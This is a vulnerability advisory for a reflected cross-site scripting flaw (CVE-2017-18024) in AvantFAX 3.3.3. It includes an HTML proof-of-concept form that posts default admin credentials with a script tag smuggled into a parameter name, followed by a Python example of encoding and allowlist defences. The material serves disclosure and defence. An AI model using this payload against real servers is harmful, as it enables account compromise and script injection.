# Title: AvantFAX 3.3.3 - XSS
# Author: Nassim Asrir
# Contact: wassline@gmail.com
# Vendor: https://www.officetracker.com/
# CVE: CVE-2017-18024
# Description
AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI,
as demonstrated by a parameter whose name contains a
SCRIPT element and whose value is 1.
------------------------------------------
# Details
The name of an arbitrarily supplied body parameter is copied into the
HTML document as plain text between tags. The payload
jlbqg<script>alert(1)</script>b7g0x was submitted in the name of an
arbitrarily supplied body parameter. This input was echoed
------------------------------------------
# Attack Type
Remote
------------------------------------------
# POC
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://server/" method="POST">
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="password" value="admin" />
<input type="hidden" name="_submit_check" value="1" />
<input type="hidden" name="jlbqg<script>alert(1)</script>b7g0x" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
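
The flaw described under Details, modeled in Python as an added example (not AvantFAX's code and not part of the advisory): a handler that writes each body parameter name between tags, shown unencoded and HTML-encoded, plus an allowlist check for names the form never sends. The `<li>` wrapper, the function names and the allowlist are assumptions; the sample body is constructed from the PoC form's fields.

```python
from html import escape
from urllib.parse import parse_qsl

# Constructed sample: the PoC form's fields as a URL-encoded POST body.
SAMPLE_BODY = (
    "username=admin&password=admin&_submit_check=1"
    "&jlbqg%3Cscript%3Ealert(1)%3C%2Fscript%3Eb7g0x=1"
)

# Assumption: the only names the login form legitimately sends.
EXPECTED_NAMES = {"username", "password", "_submit_check"}


def parse_body(body):
    """Decode an application/x-www-form-urlencoded body into (name, value) pairs."""
    return parse_qsl(body, keep_blank_values=True)


def echo_names_raw(params):
    """Vulnerable pattern: each parameter name is copied between tags unencoded."""
    return "".join(f"<li>{name}</li>" for name, _ in params)


def echo_names_encoded(params):
    """Hardened pattern: HTML-encode the name (not only the value) before output."""
    return "".join(f"<li>{escape(name, quote=True)}</li>" for name, _ in params)


def unexpected_names(params, expected=EXPECTED_NAMES):
    """Return parameter names outside the allowlist, for rejection or logging."""
    return [name for name, _ in params if name not in expected]


if __name__ == "__main__":
    params = parse_body(SAMPLE_BODY)
    print("raw:    ", echo_names_raw(params))
    print("encoded:", echo_names_encoded(params))
    print("flagged:", unexpected_names(params))
```

Output encoding is the fix for the reflection itself; the allowlist is a second layer that also gives a log signal when a request carries a parameter name the application never defined.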